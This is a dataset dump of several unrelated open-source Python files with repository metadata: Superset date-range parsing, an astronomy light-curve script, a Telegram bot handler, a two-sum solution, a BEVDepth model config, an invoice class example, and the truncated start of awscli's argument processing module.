] | permissive | j420247/incubator-superset | 7c7bff330393f0e91f5e67782f35efe8c735250a | c9b9b7404a2440a4c9d3173f0c494ed40f7fa2bd | refs/heads/master | 2023-03-11T21:53:16.827919 | 2023-02-03T19:04:17 | 2023-02-03T19:04:17 | 157,780,350 | 1 | 1 | Apache-2.0 | 2023-03-07T00:14:51 | 2018-11-15T22:24:29 | TypeScript | UTF-8 | Python | false | false | 17,370 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import calendar
import logging
import re
from datetime import datetime, timedelta
from time import struct_time
from typing import Dict, List, Optional, Tuple
import pandas as pd
import parsedatetime
from dateutil.parser import parse
from dateutil.relativedelta import relativedelta
from flask_babel import lazy_gettext as _
from holidays import country_holidays
from pyparsing import (
CaselessKeyword,
Forward,
Group,
Optional as ppOptional,
ParseException,
ParserElement,
ParseResults,
pyparsing_common,
quotedString,
Suppress,
)
from superset.charts.commands.exceptions import (
TimeDeltaAmbiguousError,
TimeRangeAmbiguousError,
TimeRangeParseFailError,
)
from superset.constants import NO_TIME_RANGE
from superset.utils.memoized import memoized
ParserElement.enablePackrat()
logger = logging.getLogger(__name__)
def parse_human_datetime(human_readable: str) -> datetime:
"""Returns ``datetime.datetime`` from human readable strings"""
x_periods = r"^\s*([0-9]+)\s+(second|minute|hour|day|week|month|quarter|year)s?\s*$"
if re.search(x_periods, human_readable, re.IGNORECASE):
raise TimeRangeAmbiguousError(human_readable)
try:
default = datetime(year=datetime.now().year, month=1, day=1)
dttm = parse(human_readable, default=default)
except (ValueError, OverflowError) as ex:
cal = parsedatetime.Calendar()
parsed_dttm, parsed_flags = cal.parseDT(human_readable)
# 0 == not parsed at all
if parsed_flags == 0:
logger.debug(ex)
raise TimeRangeParseFailError(human_readable) from ex
# when time is not extracted, we 'reset to midnight'
if parsed_flags & 2 == 0:
parsed_dttm = parsed_dttm.replace(hour=0, minute=0, second=0)
dttm = dttm_from_timetuple(parsed_dttm.utctimetuple())
return dttm
def normalize_time_delta(human_readable: str) -> Dict[str, int]:
x_unit = r"^\s*([0-9]+)\s+(second|minute|hour|day|week|month|quarter|year)s?\s+(ago|later)*$" # pylint: disable=line-too-long,useless-suppression
matched = re.match(x_unit, human_readable, re.IGNORECASE)
if not matched:
raise TimeDeltaAmbiguousError(human_readable)
key = matched[2] + "s"
value = int(matched[1])
value = -value if matched[3] == "ago" else value
return {key: value}
def dttm_from_timetuple(date_: struct_time) -> datetime:
return datetime(
date_.tm_year,
date_.tm_mon,
date_.tm_mday,
date_.tm_hour,
date_.tm_min,
date_.tm_sec,
)
def get_past_or_future(
human_readable: Optional[str],
source_time: Optional[datetime] = None,
) -> datetime:
cal = parsedatetime.Calendar()
source_dttm = dttm_from_timetuple(
source_time.timetuple() if source_time else datetime.now().timetuple()
)
return dttm_from_timetuple(cal.parse(human_readable or "", source_dttm)[0])
def parse_human_timedelta(
human_readable: Optional[str],
source_time: Optional[datetime] = None,
) -> timedelta:
"""
Returns ``datetime.timedelta`` from natural language time deltas
>>> parse_human_timedelta('1 day') == timedelta(days=1)
True
"""
source_dttm = dttm_from_timetuple(
source_time.timetuple() if source_time else datetime.now().timetuple()
)
return get_past_or_future(human_readable, source_time) - source_dttm
def parse_past_timedelta(
delta_str: str, source_time: Optional[datetime] = None
) -> timedelta:
"""
Takes a delta like '1 year' and finds the timedelta for that period in
the past, then represents that past timedelta in positive terms.
parse_human_timedelta('1 year') find the timedelta 1 year in the future.
parse_past_timedelta('1 year') returns -datetime.timedelta(-365)
or datetime.timedelta(365).
"""
return -parse_human_timedelta(
delta_str if delta_str.startswith("-") else f"-{delta_str}",
source_time,
)
def get_since_until( # pylint: disable=too-many-arguments,too-many-locals,too-many-branches
time_range: Optional[str] = None,
since: Optional[str] = None,
until: Optional[str] = None,
time_shift: Optional[str] = None,
relative_start: Optional[str] = None,
relative_end: Optional[str] = None,
) -> Tuple[Optional[datetime], Optional[datetime]]:
"""Return `since` and `until` date time tuple from string representations of
time_range, since, until and time_shift.
This functiom supports both reading the keys separately (from `since` and
`until`), as well as the new `time_range` key. Valid formats are:
- ISO 8601
- X days/years/hours/day/year/weeks
- X days/years/hours/day/year/weeks ago
- X days/years/hours/day/year/weeks from now
- freeform
Additionally, for `time_range` (these specify both `since` and `until`):
- Last day
- Last week
- Last month
- Last quarter
- Last year
- No filter
- Last X seconds/minutes/hours/days/weeks/months/years
- Next X seconds/minutes/hours/days/weeks/months/years
"""
separator = " : "
_relative_start = relative_start if relative_start else "today"
_relative_end = relative_end if relative_end else "today"
if time_range == NO_TIME_RANGE or time_range == _(NO_TIME_RANGE):
return None, None
if time_range and time_range.startswith("Last") and separator not in time_range:
time_range = time_range + separator + _relative_end
if time_range and time_range.startswith("Next") and separator not in time_range:
time_range = _relative_start + separator + time_range
if (
time_range
and time_range.startswith("previous calendar week")
and separator not in time_range
):
time_range = "DATETRUNC(DATEADD(DATETIME('today'), -1, WEEK), WEEK) : DATETRUNC(DATETIME('today'), WEEK)" # pylint: disable=line-too-long,useless-suppression
if (
time_range
and time_range.startswith("previous calendar month")
and separator not in time_range
):
time_range = "DATETRUNC(DATEADD(DATETIME('today'), -1, MONTH), MONTH) : DATETRUNC(DATETIME('today'), MONTH)" # pylint: disable=line-too-long,useless-suppression
if (
time_range
and time_range.startswith("previous calendar year")
and separator not in time_range
):
time_range = "DATETRUNC(DATEADD(DATETIME('today'), -1, YEAR), YEAR) : DATETRUNC(DATETIME('today'), YEAR)" # pylint: disable=line-too-long,useless-suppression
if time_range and separator in time_range:
time_range_lookup = [
(
r"^last\s+(day|week|month|quarter|year)$",
lambda unit: f"DATEADD(DATETIME('{_relative_start}'), -1, {unit})",
),
(
r"^last\s+([0-9]+)\s+(second|minute|hour|day|week|month|year)s?$",
lambda delta, unit: f"DATEADD(DATETIME('{_relative_start}'), -{int(delta)}, {unit})", # pylint: disable=line-too-long,useless-suppression
),
(
r"^next\s+([0-9]+)\s+(second|minute|hour|day|week|month|year)s?$",
lambda delta, unit: f"DATEADD(DATETIME('{_relative_end}'), {int(delta)}, {unit})", # pylint: disable=line-too-long,useless-suppression
),
(
r"^(DATETIME.*|DATEADD.*|DATETRUNC.*|LASTDAY.*|HOLIDAY.*)$",
lambda text: text,
),
]
since_and_until_partition = [_.strip() for _ in time_range.split(separator, 1)]
since_and_until: List[Optional[str]] = []
for part in since_and_until_partition:
if not part:
# if since or until is "", set as None
since_and_until.append(None)
continue
# Is it possible to match to time_range_lookup
matched = False
for pattern, fn in time_range_lookup:
result = re.search(pattern, part, re.IGNORECASE)
if result:
matched = True
# converted matched time_range to "formal time expressions"
since_and_until.append(fn(*result.groups())) # type: ignore
if not matched:
# default matched case
since_and_until.append(f"DATETIME('{part}')")
_since, _until = map(datetime_eval, since_and_until)
else:
since = since or ""
if since:
since = add_ago_to_since(since)
_since = parse_human_datetime(since) if since else None
_until = (
parse_human_datetime(until)
if until
else parse_human_datetime(_relative_end)
)
if time_shift:
time_delta = parse_past_timedelta(time_shift)
_since = _since if _since is None else (_since - time_delta)
_until = _until if _until is None else (_until - time_delta)
if _since and _until and _since > _until:
raise ValueError(_("From date cannot be larger than to date"))
return _since, _until
def add_ago_to_since(since: str) -> str:
"""
Backwards compatibility hack. Without this slices with since: 7 days will
be treated as 7 days in the future.
:param str since:
:returns: Since with ago added if necessary
:rtype: str
"""
since_words = since.split(" ")
grains = ["days", "years", "hours", "day", "year", "weeks"]
if len(since_words) == 2 and since_words[1] in grains:
since += " ago"
return since
class EvalText: # pylint: disable=too-few-public-methods
def __init__(self, tokens: ParseResults) -> None:
self.value = tokens[0]
def eval(self) -> str:
# strip quotes
return self.value[1:-1]
class EvalDateTimeFunc: # pylint: disable=too-few-public-methods
def __init__(self, tokens: ParseResults) -> None:
self.value = tokens[1]
def eval(self) -> datetime:
return parse_human_datetime(self.value.eval())
class EvalDateAddFunc: # pylint: disable=too-few-public-methods
def __init__(self, tokens: ParseResults) -> None:
self.value = tokens[1]
def eval(self) -> datetime:
dttm_expression, delta, unit = self.value
dttm = dttm_expression.eval()
if unit.lower() == "quarter":
delta = delta * 3
unit = "month"
return dttm + parse_human_timedelta(f"{delta} {unit}s", dttm)
class EvalDateTruncFunc: # pylint: disable=too-few-public-methods
def __init__(self, tokens: ParseResults) -> None:
self.value = tokens[1]
def eval(self) -> datetime:
dttm_expression, unit = self.value
dttm = dttm_expression.eval()
if unit == "year":
dttm = dttm.replace(
month=1, day=1, hour=0, minute=0, second=0, microsecond=0
)
if unit == "quarter":
dttm = (
pd.Period(pd.Timestamp(dttm), freq="Q").to_timestamp().to_pydatetime()
)
elif unit == "month":
dttm = dttm.replace(day=1, hour=0, minute=0, second=0, microsecond=0)
elif unit == "week":
dttm -= relativedelta(days=dttm.weekday())
dttm = dttm.replace(hour=0, minute=0, second=0, microsecond=0)
elif unit == "day":
dttm = dttm.replace(hour=0, minute=0, second=0, microsecond=0)
elif unit == "hour":
dttm = dttm.replace(minute=0, second=0, microsecond=0)
elif unit == "minute":
dttm = dttm.replace(second=0, microsecond=0)
else:
dttm = dttm.replace(microsecond=0)
return dttm
class EvalLastDayFunc: # pylint: disable=too-few-public-methods
def __init__(self, tokens: ParseResults) -> None:
self.value = tokens[1]
def eval(self) -> datetime:
dttm_expression, unit = self.value
dttm = dttm_expression.eval()
if unit == "year":
return dttm.replace(
month=12, day=31, hour=0, minute=0, second=0, microsecond=0
)
if unit == "month":
return dttm.replace(
day=calendar.monthrange(dttm.year, dttm.month)[1],
hour=0,
minute=0,
second=0,
microsecond=0,
)
# unit == "week":
mon = dttm - relativedelta(days=dttm.weekday())
mon = mon.replace(hour=0, minute=0, second=0, microsecond=0)
return mon + relativedelta(days=6)
class EvalHolidayFunc: # pylint: disable=too-few-public-methods
def __init__(self, tokens: ParseResults) -> None:
self.value = tokens[1]
def eval(self) -> datetime:
holiday = self.value[0].eval()
dttm, country = [None, None]
if len(self.value) >= 2:
dttm = self.value[1].eval()
if len(self.value) == 3:
country = self.value[2]
holiday_year = dttm.year if dttm else parse_human_datetime("today").year
country = country.eval() if country else "US"
holiday_lookup = country_holidays(country, years=[holiday_year], observed=False)
searched_result = holiday_lookup.get_named(holiday)
if len(searched_result) == 1:
return dttm_from_timetuple(searched_result[0].timetuple())
raise ValueError(
_("Unable to find such a holiday: [%(holiday)s]", holiday=holiday)
)
@memoized
def datetime_parser() -> ParseResults: # pylint: disable=too-many-locals
( # pylint: disable=invalid-name
DATETIME,
DATEADD,
DATETRUNC,
LASTDAY,
HOLIDAY,
YEAR,
QUARTER,
MONTH,
WEEK,
DAY,
HOUR,
MINUTE,
SECOND,
) = map(
CaselessKeyword,
"datetime dateadd datetrunc lastday holiday "
"year quarter month week day hour minute second".split(),
)
lparen, rparen, comma = map(Suppress, "(),")
int_operand = pyparsing_common.signed_integer().setName("int_operand")
text_operand = quotedString.setName("text_operand").setParseAction(EvalText)
# allow expression to be used recursively
datetime_func = Forward().setName("datetime")
dateadd_func = Forward().setName("dateadd")
datetrunc_func = Forward().setName("datetrunc")
lastday_func = Forward().setName("lastday")
holiday_func = Forward().setName("holiday")
date_expr = (
datetime_func | dateadd_func | datetrunc_func | lastday_func | holiday_func
)
datetime_func <<= (DATETIME + lparen + text_operand + rparen).setParseAction(
EvalDateTimeFunc
)
dateadd_func <<= (
DATEADD
+ lparen
+ Group(
date_expr
+ comma
+ int_operand
+ comma
+ (YEAR | QUARTER | MONTH | WEEK | DAY | HOUR | MINUTE | SECOND)
+ ppOptional(comma)
)
+ rparen
).setParseAction(EvalDateAddFunc)
datetrunc_func <<= (
DATETRUNC
+ lparen
+ Group(
date_expr
+ comma
+ (YEAR | QUARTER | MONTH | WEEK | DAY | HOUR | MINUTE | SECOND)
+ ppOptional(comma)
)
+ rparen
).setParseAction(EvalDateTruncFunc)
lastday_func <<= (
LASTDAY
+ lparen
+ Group(date_expr + comma + (YEAR | MONTH | WEEK) + ppOptional(comma))
+ rparen
).setParseAction(EvalLastDayFunc)
holiday_func <<= (
HOLIDAY
+ lparen
+ Group(
text_operand
+ ppOptional(comma)
+ ppOptional(date_expr)
+ ppOptional(comma)
+ ppOptional(text_operand)
+ ppOptional(comma)
)
+ rparen
).setParseAction(EvalHolidayFunc)
return date_expr
def datetime_eval(datetime_expression: Optional[str] = None) -> Optional[datetime]:
if datetime_expression:
try:
return datetime_parser().parseString(datetime_expression)[0].eval()
except ParseException as ex:
raise ValueError(ex) from ex
return None
class DateRangeMigration: # pylint: disable=too-few-public-methods
x_dateunit_in_since = (
r'"time_range":\s*"\s*[0-9]+\s+(day|week|month|quarter|year)s?\s*\s:\s'
)
x_dateunit_in_until = (
r'"time_range":\s*".*\s:\s*[0-9]+\s+(day|week|month|quarter|year)s?\s*"'
)
x_dateunit = r"^\s*[0-9]+\s+(day|week|month|quarter|year)s?\s*$"
| [
"noreply@github.com"
] | j420247.noreply@github.com |
897f1e3a9e728d1fa9d621e94dc4fd26b2179861 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_203512.89+152029.3/sdB_sdssj_203512.89+152029.3_lc.py | ed34883c535f2590c57d4ff4b91b6ce2db5f9d5f | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[308.803708,15.341472], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_sdssj_203512.89+152029.3/sdB_sdssj_203512.89+152029.3_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
b28f4481f84cc96b3adba71e3715fbe9ff783705 | f2cece9e5f2af8482c12fc7ad8b3a7e63e6de052 | /tbot/handlers/user/start.py | 4b2ae37538b4ce57deaca2c8b96805159c068fa2 | [] | no_license | nikifkon-old/questionnaire_bot | beadc716ca0a7cbfa6a4c47039c00123e8892eb4 | 3cbf889c7edf4ba438ce7e46c5f9b67efe5d7e72 | refs/heads/master | 2023-04-24T07:12:28.227259 | 2020-08-03T09:14:35 | 2020-08-03T09:14:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,186 | py | from aiogram import types
from tbot import messages, schemas
from tbot.bot import bot
from tbot.handlers.utils import process_if_user_exit, send_welcome_message
from tbot.utils import save_user
from .register import bot_register
async def bot_start(message: types.Message):
"""
/start command handler
"""
chat_id = message.chat.id
continue_ = await process_if_user_exit(user_id=chat_id)
if continue_:
payload = message.get_args()
if payload:
data, created = schemas.House.from_string(payload)
if created:
user_lang = message.from_user.language_code
user = schemas.User(id=chat_id, house=data, lang=user_lang)
save_user(user)
await send_welcome_message(user)
else:
await bot.send_message(
chat_id=chat_id,
text=messages.INVALID_START_PAYLOAD_ERROR.format(error_message=data["error_msg"])
)
else:
await bot.send_message(
chat_id=chat_id,
text=messages.START_MESSAGE
)
await bot_register(message)
| [
"kostya.nik.3854@gmail.com"
] | kostya.nik.3854@gmail.com |
f811d2d33cb606d533dd48f19f66579b24eae8f0 | 81d2e3b6fe042e70cc2abb7f549f60ba44928fdf | /binarysearch/167.two-sum-ii-input-array-is-sorted.py | 5263d1575f7673caccb884b02909c3aa8860a62f | [] | no_license | weizhixiaoyi/leetcode | a506faed3904342ed65234864df52071977d544d | 6114ebacc939f48a39a56d366646b0f28b4f6c1a | refs/heads/master | 2022-12-22T03:52:07.936800 | 2020-09-29T07:49:52 | 2020-09-29T07:49:52 | 202,662,720 | 5 | 2 | null | 2019-08-17T09:24:49 | 2019-08-16T05:16:08 | C++ | UTF-8 | Python | false | false | 1,303 | py | # -*- coding:utf-8 -*-
from typing import List
class Solution:
# def twoSum(self, numbers: List[int], target: int) -> List[int]:
# nums_len = len(numbers)
#
# def binary_search(line, k):
# left, right = 0, len(line) - 1
# while left <= right:
# mid = left + (right - left) // 2
# if line[mid] <= k:
# left = mid + 1
# if line[mid] > k:
# right = mid - 1
# return left - 1 if line[left - 1] == k else -1
#
# for k in range(0, nums_len):
# idx = binary_search(numbers, target - numbers[k])
# if idx != -1:
# return [k + 1, idx + 1]
# 双指针
def twoSum(self, numbers: List[int], target: int) -> List[int]:
cur_sum = 0
left, right = 0, len(numbers) - 1
while left < right:
cur_sum = numbers[left] + numbers[right]
if cur_sum == target:
return [left + 1, right + 1]
if cur_sum < target:
left += 1
if cur_sum > target:
right -= 1
if __name__ == '__main__':
values = [1, 2, 3, 4, 4, 5]
target = 8
ans = Solution().twoSum(values, target)
print('ans: ', ans)
| [
"zhenhai.gl@gmail.com"
] | zhenhai.gl@gmail.com |
79f82030a48735a86adfccce5e9f80853fc062fe | 81a62053841c03d9621fd31f8e7984c712c7aed2 | /zoo/BEVDepth/exps/mv/bev_depth_lss_r50_256x704_128x128_20e_cbgs_2key_da.py | 5ed3cd169fb3435f26326fe5c7432fe9302e61be | [
"MIT"
] | permissive | Daniel-xsy/BEV-Attack | d0eb3a476875f9578c53df9bcb21564dea18ce0c | 7970b27396c1af450c80b12eb312e76a8ab52a0a | refs/heads/master | 2023-05-23T01:13:44.121533 | 2023-02-22T05:48:14 | 2023-02-22T05:48:14 | 540,328,937 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,038 | py | # Copyright (c) Megvii Inc. All rights reserved.
"""
mAP: 0.3484
mATE: 0.6159
mASE: 0.2716
mAOE: 0.4144
mAVE: 0.4402
mAAE: 0.1954
NDS: 0.4805
Eval time: 110.7s
Per-class results:
Object Class AP ATE ASE AOE AVE AAE
car 0.553 0.480 0.157 0.117 0.386 0.205
truck 0.252 0.645 0.202 0.097 0.381 0.185
bus 0.378 0.674 0.197 0.090 0.871 0.298
trailer 0.163 0.932 0.230 0.409 0.543 0.098
construction_vehicle 0.076 0.878 0.495 1.015 0.103 0.344
pedestrian 0.361 0.694 0.300 0.816 0.491 0.247
motorcycle 0.319 0.569 0.252 0.431 0.552 0.181
bicycle 0.286 0.457 0.255 0.630 0.194 0.006
traffic_cone 0.536 0.438 0.339 nan nan nan
barrier 0.559 0.392 0.289 0.124 nan nan
"""
import torch
import torch.nn as nn
from torch.cuda.amp.autocast_mode import autocast
from torch.optim.lr_scheduler import MultiStepLR
from exps.base_cli import run_cli
from exps.mv.bev_depth_lss_r50_256x704_128x128_24e_2key import \
BEVDepthLightningModel as BaseBEVDepthLightningModel
from layers.backbones.base_lss_fpn import BaseLSSFPN as BaseLSSFPN
from layers.heads.bev_depth_head import BEVDepthHead
from models.base_bev_depth import BaseBEVDepth as BaseBEVDepth
class DepthAggregation(nn.Module):
"""
pixel cloud feature extraction
"""
def __init__(self, in_channels, mid_channels, out_channels):
super(DepthAggregation, self).__init__()
self.reduce_conv = nn.Sequential(
nn.Conv2d(in_channels,
mid_channels,
kernel_size=3,
stride=1,
padding=1,
bias=False),
nn.BatchNorm2d(mid_channels),
nn.ReLU(inplace=True),
)
self.conv = nn.Sequential(
nn.Conv2d(mid_channels,
mid_channels,
kernel_size=3,
stride=1,
padding=1,
bias=False),
nn.BatchNorm2d(mid_channels),
nn.ReLU(inplace=True),
nn.Conv2d(mid_channels,
mid_channels,
kernel_size=3,
stride=1,
padding=1,
bias=False),
nn.BatchNorm2d(mid_channels),
nn.ReLU(inplace=True),
)
self.out_conv = nn.Sequential(
nn.Conv2d(mid_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=True),
# nn.BatchNorm3d(out_channels),
# nn.ReLU(inplace=True),
)
@autocast(False)
def forward(self, x):
x = self.reduce_conv(x)
x = self.conv(x) + x
x = self.out_conv(x)
return x
class LSSFPN(BaseLSSFPN):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.depth_aggregation_net = self._configure_depth_aggregation_net()
def _configure_depth_aggregation_net(self):
"""build pixel cloud feature extractor"""
return DepthAggregation(self.output_channels, self.output_channels,
self.output_channels)
def _forward_voxel_net(self, img_feat_with_depth):
# BEVConv2D [n, c, d, h, w] -> [n, h, c, w, d]
img_feat_with_depth = img_feat_with_depth.permute(
0, 3, 1, 4, 2).contiguous() # [n, c, d, h, w] -> [n, h, c, w, d]
n, h, c, w, d = img_feat_with_depth.shape
img_feat_with_depth = img_feat_with_depth.view(-1, c, w, d)
img_feat_with_depth = (
self.depth_aggregation_net(img_feat_with_depth).view(
n, h, c, w, d).permute(0, 2, 4, 1, 3).contiguous().float())
return img_feat_with_depth
class BEVDepth(BaseBEVDepth):
def __init__(self, backbone_conf, head_conf, is_train_depth=True):
super(BaseBEVDepth, self).__init__()
self.backbone = LSSFPN(**backbone_conf)
self.head = BEVDepthHead(**head_conf)
self.is_train_depth = is_train_depth
class BEVDepthLightningModel(BaseBEVDepthLightningModel):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.model = BEVDepth(self.backbone_conf,
self.head_conf,
is_train_depth=True)
self.data_use_cbgs = True
def configure_optimizers(self):
lr = self.basic_lr_per_img * \
self.batch_size_per_device * self.gpus
optimizer = torch.optim.AdamW(self.model.parameters(),
lr=lr,
weight_decay=1e-7)
scheduler = MultiStepLR(optimizer, [16, 19])
return [[optimizer], [scheduler]]
if __name__ == '__main__':
run_cli(BEVDepthLightningModel,
'bev_depth_lss_r50_256x704_128x128_20e_cbgs_2key_da')
| [
"1491387884@qq.com"
] | 1491387884@qq.com |
54b776d05894dbd7304491d291348150d9dee7f7 | 251af797da940483d843077cfe1912acd019e73e | /sis/schedule/migrations/0001_initial.py | bddf4e281d27779ecb610321405d32bca51de9cf | [] | no_license | mitctc/sis | 951d57fce1376947cbc6a00594d17c1cfb5f78d6 | 9a955b6c12cae977bd45ff6025a87b492fa0f6e1 | refs/heads/master | 2021-05-30T13:12:10.705276 | 2016-02-14T02:23:01 | 2016-02-14T02:23:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,537 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-09 14:09
from __future__ import unicode_literals
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('course', '0010_auto_20160209_0828'),
]
operations = [
migrations.CreateModel(
name='LabSession',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=120)),
('start_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
('end_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
('is_present', models.BooleanField()),
('activity', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='course.Activity')),
],
),
migrations.CreateModel(
name='PracticalSession',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=120)),
('start_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
('end_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
('is_present', models.BooleanField()),
('activity', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='course.Activity')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='TheorySession',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=120)),
('start_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
('end_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
('is_present', models.BooleanField()),
('activity', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='course.Activity')),
],
),
]
| [
"sumudu.susahe@gmail.com"
] | sumudu.susahe@gmail.com |
27e371636f02b8abf128178364910ed7e959ff49 | 891902687207fb335b65dbb8d31d6e20301764f9 | /pe103.py | 87cd77af804629f8d4877da843a2d8a0c204e281 | [] | no_license | maecchi/PE | 93bd050eaca2733aa37db6ca493b820fe3d7a351 | 3d9092635807f0036719b65adb16f1c0926c2321 | refs/heads/master | 2020-05-04T16:38:36.476355 | 2012-06-10T05:26:10 | 2012-06-10T05:26:10 | 1,746,853 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,651 | py | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#
# pe103.py - Project Euler
#
# 題意の規則に乗っ取って条件を作成する
from itertools import *
N = 7
#
def findsSum(a, n):
if n == 0:
return True
elif len(a) == 0:
return False
elif n < 0:
return False
else:
a2 = a[1:]
return any((findsSum(a2, n - a[0]), findsSum(a2, n)))
# 部分集合の和が等しくてはならない
def condition1(a):
def c2_core(b):
s = sum(b)
if s % 2 == 1:
return True
half = s / 2
back = b[-1]
n = half - back
return not findsSum(b[:-1], n)
n = len(a)
return all(c2_core(b) for m in range(3, n+1) for b in combinations(a, m))
# 部分集合は多くの要素を含んでいた方が値が大きい
def condition2(a):
n = len(a)
return sum(a[:(n+1)/2]) > sum(a[n/2+1:])
# 条件を両方とも満たすか確認
def isValid(a):
return condition2(a) and condition1(a)
# 集合を作成する
# a: 集合要素
# prev: 前の要素
# k: 対象要素番号
def genSets(a, prev = 0 , k = 0):
if k == len(a):
yield []
else:
begin = max(a[k] - 2, prev + 1) # -2から+1の範囲で次の値を考える
if k == len(a) - 1:
end = a[k] + 1
else :
end = min(a[k] + 1, a[k+1] - 1)
for p in range(begin, end+1):
for b in genSets(a, p, k+1):
yield [p] + b
# 最小値を求める
def minimize(a):
solutions = [b for b in genSets(a) if isValid(b)]
return min(solutions, key = lambda a: sum(a))
# 次の最適集合を求める
def nextSet(a):
n = len(a)
b = a[n/2]
return minimize([b] + [e + b for e in a])
a = reduce(lambda x, y : nextSet(x), range(2, N+1), [1])
print "".join(map(str, a))
| [
"aos81922710@yahoo.co.jp"
] | aos81922710@yahoo.co.jp |
c174095d9ba03d8fb0442391289c0b3348b8c63e | ee052fca7b7cdf875b3e18f28f6102395407d584 | /python/example/objects.py | 2218d352afd3c9582e59cca26ab888f4c26106a8 | [] | no_license | vimm0/algorithm-challenges | 8313813dbbba0dff4c0d872d68c74f9b508d956f | f4ae12b7a33340b8f3c4ce105b7ef3fb9f24e613 | refs/heads/master | 2020-03-26T23:51:52.913657 | 2018-10-30T16:16:52 | 2018-10-30T16:16:52 | 145,573,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,322 | py | #!/usr/bin/python
from builtins import staticmethod, str
class InvoiceItem:
"""
An item within the invoice
"""
def __str__(self):
return self.text + ' ' + str(self.amt)
def __init__(self, **kwargs):
self.text = ''
self.amt = 0
if kwargs['text'] is not None:
self.text = kwargs['text']
if kwargs['amt'] is not None:
self.amt = kwargs['amt']
class Invoice:
# This is a static variable
my_company_name = "DIYComputerScience"
# This is a static method
@staticmethod
def get_service_tax_per():
return 12.5
'''An invoice.'''
def __str__(self):
return self.number + ' ' + str(self.amt())
def __init__(self, **kwargs):
self.number = ''
self.client = ''
self.date = ''
self.invoice_items = []
def add_invoice_item(self, invoice_entry):
self.invoice_items.append(invoice_entry)
def amt(self):
amt = 0
for item in self.invoice_items:
amt = amt + item.amt
return amt
invoice = Invoice()
invoice.number = '20080422_01'
invoice.client = 'Sun Microsystems'
invoice.date = '22/04/2008'
invoice_item = InvoiceItem(text='consulting April', amt=2000)
invoice.add_invoice_item(invoice_item)
print(invoice)
| [
"vimmrana0@gmail.com"
] | vimmrana0@gmail.com |
19493802781bbd6845ba8f897d5a7004bda11c51 | e4a428b91a6c4ff15f98a8109bfddbb3182fa9f3 | /Lib/site-packages/awscli/argprocess.py | 1d91e63e952a37550a1a9f66bf68e2c8aeac7924 | [
"MIT"
] | permissive | bopopescu/django-estore | 59a906f9cbc7da2f1aa9dda08ac05595744975a9 | c092ffa965b8ef68e71d27d34a17fde1beacd90e | refs/heads/master | 2022-11-22T14:11:13.051232 | 2017-03-15T03:49:15 | 2017-03-15T03:49:15 | 281,940,168 | 0 | 0 | MIT | 2020-07-23T12:04:17 | 2020-07-23T12:04:17 | null | UTF-8 | Python | false | false | 20,751 | py | # Copyright 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Module for processing CLI args."""
import os
import logging
from awscli.compat import six
from botocore.compat import OrderedDict, json
from awscli import SCALAR_TYPES, COMPLEX_TYPES
from awscli.paramfile import get_paramfile, ResourceLoadingError
from awscli.paramfile import PARAMFILE_DISABLED
from awscli import shorthand
from awscli.utils import find_service_and_method_in_event_name
LOG = logging.getLogger('awscli.argprocess')
class ParamError(Exception):
def __init__(self, cli_name, message):
"""
:type cli_name: string
:param cli_name: The complete cli argument name,
e.g. "--foo-bar". It should include the leading
